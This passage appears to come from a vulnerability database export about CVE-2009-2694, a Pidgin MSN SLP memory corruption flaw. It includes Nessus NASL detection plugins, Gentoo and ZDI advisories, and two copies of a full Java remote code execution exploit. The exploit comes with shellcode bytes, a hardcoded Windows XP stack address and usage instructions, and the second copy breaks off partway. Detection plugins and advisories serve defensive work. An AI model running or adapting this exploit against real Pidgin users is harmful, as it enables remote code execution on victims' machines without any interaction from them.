handler. A remote attacker\ncould send a specially crafted message and possibly execute arbitrary\ncode with user privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/820-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:finch-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpurple0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:pidgin-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"finch-dev\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"gaim\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-bin\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple-dev\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpurple0\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin\", pkgver:\"1:2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-data\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"pidgin-dev\", pkgver:\"2.4.1-1ubuntu2.6\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"finch-dev\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-bin\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple-dev\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"libpurple0\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin\", pkgver:\"1:2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-data\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dev\", pkgver:\"2.5.2-0ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch-dev\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-bin\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-dev\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple0\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin\", pkgver:\"1:2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-data\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dev\", pkgver:\"2.5.5-1ubuntu8.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-dev / gaim / libpurple-bin / libpurple-dev / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-01T03:04:54", "description": "The version of Pidgin installed on the remote host is earlier than\n2.5.9. Such versions are reportedly affected by a vulnerability in\n'msn_slplink_process_msg()'. Maliciously crafted MSN SLP messages\ncan result in memory corruption. A remote attacker could use this to\ncrash the client, or execute arbitrary code.\n\nThis attack does not require user interaction or that the attacker\nis in the victim's buddy list (using the default configuration).", "edition": 31, "published": "2009-08-20T00:00:00", "title": "Pidgin < 2.5.9 'msn_slplink_process_msg()' Memory Corruption", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2694"], "modified": "2021-06-02T00:00:00", "cpe": ["cpe:/a:pidgin:pidgin"], "id": "PIDGIN_2_5_9.NASL", "href": "https://www.tenable.com/plugins/nessus/40663", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(40663);\n script_version(\"1.11\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"Secunia\", value:\"36384\");\n\n script_name(english:\"Pidgin < 2.5.9 'msn_slplink_process_msg()' Memory Corruption\");\n script_summary(english:\"Does a version check\");\n\n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote host has an instant messaging client that is affected by a\nmemory corruption vulnerability.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The version of Pidgin installed on the remote host is earlier than\n2.5.9. Such versions are reportedly affected by a vulnerability in\n'msn_slplink_process_msg()'. Maliciously crafted MSN SLP messages\ncan result in memory corruption. A remote attacker could use this to\ncrash the client, or execute arbitrary code.\n\nThis attack does not require user interaction or that the attacker\nis in the victim's buddy list (using the default configuration).\" );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.coresecurity.com/content/libpurple-arbitrary-write\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2009/Aug/174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://pidgin.im/news/security/?id=34\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade to Pidgin 2.5.9 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n script_set_attribute(\n attribute:\"vuln_publication_date\",\n value:\"2009/08/18\"\n );\n script_set_attribute(\n attribute:\"patch_publication_date\",\n value:\"2009/08/18\"\n );\n script_set_attribute(\n attribute:\"plugin_publication_date\",\n value:\"2009/08/20\"\n );\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pidgin:pidgin\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"pidgin_installed.nasl\");\n script_require_keys(\"SMB/Pidgin/Version\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\nversion = get_kb_item(\"SMB/Pidgin/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/Pidgin/Version' KB item is missing.\");\n\nver_fields = split(version, sep:'.', keep:FALSE);\nmajor = int(ver_fields[0]);\nminor = int(ver_fields[1]);\nrev = int(ver_fields[2]);\n\n# Versions < 2.5.9 are affected\nif (\n major < 2 ||\n (major == 2 && minor < 5) ||\n (major == 2 && minor == 5 && rev < 9)\n)\n{\n port = get_kb_item(\"SMB/transport\");\n\n if(report_verbosity > 0)\n {\n report = string(\n \"\\n\",\n \" Installed version : \", version, \"\\n\",\n \" Should be at least : 2.5.9\\n\"\n );\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse exit(0, \"Version \" + version + \" is not affected.\");\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-3026", "CVE-2009-1889", "CVE-2009-2694"], "edition": 1, "description": "### Background\n\nPidgin is a client for a variety of instant messaging protocols. \n\n### Description\n\nMultiple vulnerabilities were found in Pidgin: \n\n * Yuriy Kaminskiy reported that the OSCAR protocol implementation in Pidgin misinterprets the ICQWebMessage message type as the ICQSMS message type, triggering an allocation of a large amount of memory (CVE-2009-1889).\n * Federico Muttis of Core Security Technologies reported that the msn_slplink_process_msg() function in libpurple/protocols/msn/slplink.c in libpurple as used in Pidgin doesn't properly process incoming SLP messages, triggering an overwrite of an arbitrary memory location (CVE-2009-2694). NOTE: This issue reportedly exists because of an incomplete fix for CVE-2009-1376 (GLSA 200905-07).\n * bugdave reported that protocols/jabber/auth.c in libpurple as used in Pidgin does not follow the \"require TSL/SSL\" preference when connecting to older Jabber servers that do not follow the XMPP specification, resulting in a connection to the server without the expected encryption (CVE-2009-3026).\n\n### Impact\n\nA remote attacker could send specially crafted SLP (via MSN) or ICQ web messages, possibly leading to execution of arbitrary code with the privileges of the user running Pidgin, unauthorized information disclosure, or a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Pidgin users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/pidgin-2.5.9-r1\"", "modified": "2009-10-22T00:00:00", "published": "2009-10-22T00:00:00", "id": "GLSA-200910-02", "href": "https://security.gentoo.org/glsa/200910-02", "type": "gentoo", "title": "Pidgin: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2020-06-22T11:40:30", "bulletinFamily": "info", "cvelist": ["CVE-2009-1376"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of messaging applications that make use of the libpurple library. User interaction is not required to exploit this vulnerability. The specific flaw exists in the implementation of the MSN protocol, specifically the handling of SLP messages. The function msn_slplink_process_msg() fails to properly validate an offset value specified in the SLP packet. By providing a specific value, an attacker can overflow a heap buffer resulting in arbitrary code execution.", "modified": "2009-06-22T00:00:00", "published": "2009-06-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-031/", "id": "ZDI-09-031", "title": "Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:13", "description": "", "published": "2009-09-10T00:00:00", "type": "packetstorm", "title": "Pidgin MSN 2.5.8 Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2009-09-10T00:00:00", "id": "PACKETSTORM:81096", "href": "https://packetstormsecurity.com/files/81096/Pidgin-MSN-2.5.8-Code-Execution.html", "sourceData": "`/* \n* Pidgin MSN <= 2.5.8 Remote Code Execution \n* \n* Pierre Nogues - pierz@hotmail.it \n* http://www.indahax.com/ \n* \n* \n* Description: \n* Pidgin is a multi-protocol Instant Messenger. \n* \n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2]. \n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets \n* which could lead to memory corruption. \n* \n* Affected versions : \n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library. \n* \n* Plateforms : \n* Windows, Linux, Mac \n* \n* Fix : \n* Fixed in Pidgin 2.5.9 \n* Update to the latest version : http://www.pidgin.im/download/ \n* \n* References : \n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694 \n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write \n* [3] http://www.pidgin.im/news/security/?id=34 \n* \n* Usage : \n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/ \n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java \n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL \n* \n*/ \n \nimport net.sf.jml.*; \nimport net.sf.jml.event.*; \nimport net.sf.jml.impl.*; \nimport net.sf.jml.message.p2p.*; \nimport net.sf.jml.util.*; \n \npublic class PidginExploit { \n \nprivate MsnMessenger messenger; \nprivate String login; \nprivate String password; \nprivate String target; \n \nprivate int session_id = NumberUtils.getIntRandom(); \n \nprivate byte shellcode[] = new byte[] { \n \n/* \n* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom ! \n* sub esp,500 \n*/ \n(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00, \n \n \n/* \n* windows/exec - 121 bytes \n* http://www.metasploit.com \n* EXITFUNC=process, CMD=calc.exe \n*/ \n(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45, \n(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b, \n(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49, \n(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99, \n(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d, \n(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04, \n(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66, \n(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb, \n(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24, \n(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64, \n(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70, \n(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83, \n(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73, \n(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7, \n(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65, \n(byte) 0x00 \n}; \n \n// reteip = pointer to the return address in the stack \n// The shellcode will be wrote just before reteip \n// and reteip will automaticly point to the shellcode. It's magic ! \nprivate int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8 \n \nprivate int neweip; \nprivate byte[] payload = new byte[shellcode.length + 4]; \nprivate int totallength = reteip + 4; \n \npublic static void main(String[] args) throws Exception { \n \nif(args.length != 3){ \nSystem.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\"); \n}else{ \nPidginExploit exploit = new PidginExploit(args[0],args[1],args[2]); \nexploit.start(); \n} \n \n} \n \npublic PidginExploit(String login, String password, String target){ \nthis.login = login; \nthis.password = password; \nthis.target = target; \n \nneweip = reteip - shellcode.length ; \n \nfor(int i=0;i<shellcode.length;i++) \npayload[i] = shellcode[i]; \n \npayload[shellcode.length] = (byte)(neweip & 0x000000FF); \npayload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8); \npayload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16); \npayload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24); \n} \n \npublic void start() { \nmessenger = MsnMessengerFactory.createMsnMessenger(login,password); \nmessenger.getOwner().setInitStatus(MsnUserStatus.ONLINE); \n \nmessenger.setLogIncoming(false); \nmessenger.setLogOutgoing(false); \n \ninitMessenger(messenger); \nmessenger.login(); \n} \n \nprotected void initMessenger(MsnMessenger messenger) { \n \nmessenger.addContactListListener(new MsnContactListAdapter() { \n \npublic void contactListInitCompleted(MsnMessenger messenger) { \n \nfinal Object id = new Object(); \n \nmessenger.addSwitchboardListener(new MsnSwitchboardAdapter() { \n \npublic void switchboardStarted(MsnSwitchboard switchboard) { \n \nif (id != switchboard.getAttachment()) \nreturn; \n \nswitchboard.inviteContact(Email.parseStr(target)); \n} \n \npublic void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) { \nif (id != switchboard.getAttachment()) \nreturn; \n \nMsnP2PSlpMessage msg = new MsnP2PSlpMessage(); \nmsg.setIdentifier(NumberUtils.getIntRandom()); \nmsg.setSessionId(session_id); \nmsg.setOffset(0); \nmsg.setTotalLength(totallength); \nmsg.setCurrentLength(totallength); \n \n// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null \n// We'll use this buffer to rewrite memory in the stack \nmsg.setFlag(0x1000020); \n \nmsg.setP2PDest(target); \n \nswitchboard.sendMessage(msg); \n \nSystem.out.println(\"First packet sent, waiting for the ACK\"); \n \n} \n \npublic void switchboardClosed(MsnSwitchboard switchboard) { \nSystem.out.println(\"switchboardClosed\"); \nswitchboard.getMessenger().removeSwitchboardListener(this); \n} \n \npublic void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){ \nSystem.out.println(\"contactLeaveSwitchboard\"); \n} \n}); \nmessenger.newSwitchboard(id); \n} \n}); \n \nmessenger.addMessageListener(new MsnMessageAdapter(){ \n \npublic void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) { \n \n//We receive the ACK of our first packet with the ID of the new bogus packet \nmessage.getIdentifier(); \n \nMsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip, \npayload.length, payload, target); \n \nswitchboard.sendMessage(msg); \nSystem.out.println(\"ACK received && Payload sent !\"); \nSystem.out.println(\"Exploit OK ! CTRL+C to quit\"); \n \n} \n}); \n \n \n \nmessenger.addMessengerListener(new MsnMessengerAdapter() { \n \npublic void loginCompleted(MsnMessenger messenger) { \nSystem.out.println(messenger.getOwner().getEmail() + \" login\"); \n} \n \npublic void logout(MsnMessenger messenger) { \nSystem.out.println(messenger.getOwner().getEmail() + \" logout\"); \n} \n \npublic void exceptionCaught(MsnMessenger messenger, \nThrowable throwable) { \nSystem.out.println(\"caught exception: \" + throwable); \n} \n}); \n \n} \n} \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/81096/pidginmsn-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:42", "description": "\nPidgin MSN 2.5.8 - Remote Code Execution", "edition": 1, "published": "2009-09-09T00:00:00", "title": "Pidgin MSN 2.5.8 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2694"], "modified": "2009-09-09T00:00:00", "id": "EXPLOITPACK:F73EA20BBECA556E930239128D9B66B0", "href": "", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n 